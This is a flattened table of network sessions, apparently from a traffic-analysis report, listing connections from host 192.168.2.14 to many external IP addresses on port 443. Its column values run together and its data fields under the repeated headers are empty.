                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17553192.168.2.144651659.60.22.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17554192.168.2.144164051.216.57.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17555192.168.2.144802857.236.5.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17556192.168.2.14421224.95.71.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17557192.168.2.145110232.12.230.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17558192.168.2.144102297.146.41.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17559192.168.2.1442716121.8.113.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17560192.168.2.14382109.1.197.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17561192.168.2.1433106210.247.61.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17562192.168.2.143827697.153.94.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17563192.168.2.144279048.17.155.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17564192.168.2.1438172182.100.192.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17565192.168.2.144371243.124.102.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17566192.168.2.1451258167.161.102.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17567192.168.2.145025491.6.72.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17568192.168.2.1447486122.132.201.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17569192.168.2.144707437.250.244.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17570192.168.2.1460824132.86.3.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17571192.168.2.1435896110.99.115.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17572192.168.2.1456082113.167.119.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17573192.168.2.1436902138.3.71.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17574192.168.2.1456666212.135.178.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17575192.168.2.144512450.202.12.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17576192.168.2.1441682204.83.10.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17577192.168.2.144342214.162.219.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17578192.168.2.1442142120.160.44.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17579192.168.2.145306054.111.117.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17580192.168.2.1438032206.142.197.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17581192.168.2.1434396146.185.77.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17582192.168.2.143564627.60.88.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17583192.168.2.1436762219.95.138.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17584192.168.2.1440264198.89.251.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17585192.168.2.143632484.39.174.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17586192.168.2.1448044172.161.82.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17587192.168.2.144711871.196.188.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17588192.168.2.1447918209.101.198.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17589192.168.2.1437432213.102.18.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17590192.168.2.1453178137.64.64.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17591192.168.2.1446190153.26.206.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17592192.168.2.1440702195.238.113.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17593192.168.2.145562279.201.16.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17594192.168.2.143555885.222.114.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17595192.168.2.1436696149.251.28.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17596192.168.2.143661020.12.90.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17597192.168.2.144782819.20.233.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17598192.168.2.143502013.12.95.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17599192.168.2.1444346190.41.136.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17600192.168.2.145285814.251.80.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17601192.168.2.1448578155.107.174.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17602192.168.2.1439954168.2.121.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17603192.168.2.1452774170.188.125.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17604192.168.2.143598632.26.26.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17605192.168.2.146008223.82.13.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17606192.168.2.145974675.20.51.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17607192.168.2.1437142110.165.233.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17608192.168.2.146097491.136.77.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17609192.168.2.1441538195.190.211.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17610192.168.2.14373304.193.137.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17611192.168.2.145489037.100.167.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17612192.168.2.144301066.223.87.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17613192.168.2.1460652200.158.216.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17614192.168.2.145911639.176.5.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17615192.168.2.1440524213.107.232.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17616192.168.2.145197427.1.128.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17617192.168.2.1459426161.141.28.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17618192.168.2.143818280.126.22.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17619192.168.2.1449986105.182.193.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17620192.168.2.1440002113.216.169.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17621192.168.2.1437840109.53.199.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17622192.168.2.144331254.237.225.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17623192.168.2.145294052.40.183.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17624192.168.2.1452402155.177.2.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17625192.168.2.1455264200.93.240.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17626192.168.2.1434506152.25.17.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17627192.168.2.1450836216.7.87.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17628192.168.2.144687812.11.159.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17629192.168.2.1460352158.152.97.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17630192.168.2.1457090212.222.1.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17631192.168.2.143918043.129.105.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17632192.168.2.1454446121.207.36.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17633192.168.2.1449774115.134.103.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17634192.168.2.1459762172.12.134.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17635192.168.2.145347444.27.119.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17636192.168.2.1444040200.164.70.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17637192.168.2.1458926122.221.101.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17638192.168.2.1455958183.52.130.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17639192.168.2.1446172161.122.29.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17640192.168.2.143733067.215.218.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17641192.168.2.143517240.185.213.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17642192.168.2.144617495.189.137.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17643192.168.2.1453962102.87.169.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17644192.168.2.1436362216.201.22.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17645192.168.2.144927051.89.137.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17646192.168.2.146029052.12.0.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17647192.168.2.143528632.53.238.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17648192.168.2.145846273.75.175.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17649192.168.2.1444988216.196.126.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17650192.168.2.144034687.210.58.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17651192.168.2.143659060.246.162.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17652192.168.2.1446208198.49.73.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17653192.168.2.145758251.7.242.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17654192.168.2.1453970134.133.58.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17655192.168.2.145884462.153.59.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17656192.168.2.145374637.255.125.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17657192.168.2.1441388158.187.226.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17658192.168.2.14363549.77.209.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17659192.168.2.144765623.37.221.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17660192.168.2.1446512184.84.228.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17661192.168.2.1443948161.197.208.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17662192.168.2.1440758223.8.44.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17663192.168.2.1453738132.168.186.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17664192.168.2.1437768211.43.111.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17665192.168.2.1451742223.51.193.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17666192.168.2.1452448206.41.96.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17667192.168.2.144658845.181.206.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17668192.168.2.143701231.187.34.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17669192.168.2.145532281.226.144.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17670192.168.2.143967892.216.111.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17671192.168.2.143926485.10.74.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17672192.168.2.143494253.146.204.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17673192.168.2.144997279.56.157.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17674192.168.2.145135642.71.209.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17675192.168.2.14388584.253.130.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17676192.168.2.145000019.194.149.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17677192.168.2.1447518101.57.168.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17678192.168.2.145393664.105.85.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17679192.168.2.1440596152.133.239.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17680192.168.2.1441774159.80.80.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17681192.168.2.1442816132.189.170.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17682192.168.2.1456502220.174.219.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17683192.168.2.1441154205.46.141.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17684192.168.2.1439242140.118.187.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17685192.168.2.1435588180.158.55.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17686192.168.2.1447244107.187.90.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17687192.168.2.1439758157.253.40.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17688192.168.2.1449268142.196.31.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17689192.168.2.1436630212.192.20.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17690192.168.2.1454612208.242.29.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17691192.168.2.144053054.177.129.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17692192.168.2.1435720178.82.143.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17693192.168.2.143961486.150.73.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17694192.168.2.145193259.95.154.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17695192.168.2.1447940178.95.210.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17696192.168.2.14448409.220.191.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17697192.168.2.1434046174.232.249.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17698192.168.2.144096046.97.7.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17699192.168.2.1448904119.135.0.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17700192.168.2.1440348154.128.163.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17701192.168.2.144541817.86.236.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17702192.168.2.144823292.245.203.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17703192.168.2.143488213.197.7.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17704192.168.2.1438710193.116.191.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17705192.168.2.1445428131.165.246.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17706192.168.2.1448968178.137.178.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17707192.168.2.1454730180.11.230.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17708192.168.2.1457114189.185.154.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17709192.168.2.1433464188.210.104.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17710192.168.2.1449236104.203.16.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17711192.168.2.145645282.229.215.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17712192.168.2.1458776118.131.168.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17713192.168.2.1441886175.156.4.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17714192.168.2.1455286184.146.119.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17715192.168.2.1449188144.15.183.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17716192.168.2.145092072.236.215.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17717192.168.2.145034041.150.66.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17718192.168.2.14519204.134.38.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17719192.168.2.1460764144.173.201.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17720192.168.2.1448300129.181.185.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17721192.168.2.145407277.229.1.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17722192.168.2.1449240155.207.127.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17723192.168.2.145192447.147.192.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17724192.168.2.1455484191.45.199.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17725192.168.2.1454910148.223.252.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17726192.168.2.145280054.194.248.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17727192.168.2.1444134105.176.53.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17728192.168.2.145883465.54.120.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17729192.168.2.1453660190.174.73.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17730192.168.2.1459848198.171.36.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17731192.168.2.144704232.103.166.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17732192.168.2.1439274176.228.149.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17733192.168.2.1435352189.173.185.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17734192.168.2.1450916155.175.207.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17735192.168.2.1434014177.218.65.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17736192.168.2.1441296163.76.163.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17737192.168.2.1456640183.108.246.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17738192.168.2.143689614.92.48.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17739192.168.2.1436790141.219.162.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17740192.168.2.1447684177.163.69.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17741192.168.2.145411862.240.133.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17742192.168.2.144340485.246.219.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17743192.168.2.144182695.15.90.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17744192.168.2.1435334205.81.52.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17745192.168.2.1453664220.56.183.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17746192.168.2.1459542221.155.189.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17747192.168.2.1458618222.72.84.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17748192.168.2.1454318217.253.65.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17749192.168.2.143743431.92.116.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17750192.168.2.145037888.148.215.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17751192.168.2.1445584191.138.148.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17752192.168.2.1455636191.173.14.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17753192.168.2.1445878122.101.235.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17754192.168.2.1458584150.212.202.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17755192.168.2.1449684189.74.3.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17756192.168.2.1460110219.154.140.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17757192.168.2.1447858143.53.170.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17758192.168.2.1445276177.103.238.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17759192.168.2.14609521.244.8.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17760192.168.2.1450096179.54.219.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17761192.168.2.1446600193.147.36.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17762192.168.2.1443606209.3.60.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17763192.168.2.1454132192.138.215.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17764192.168.2.143420823.6.154.168443
                                                        TimestampBytes transferredDirectionData


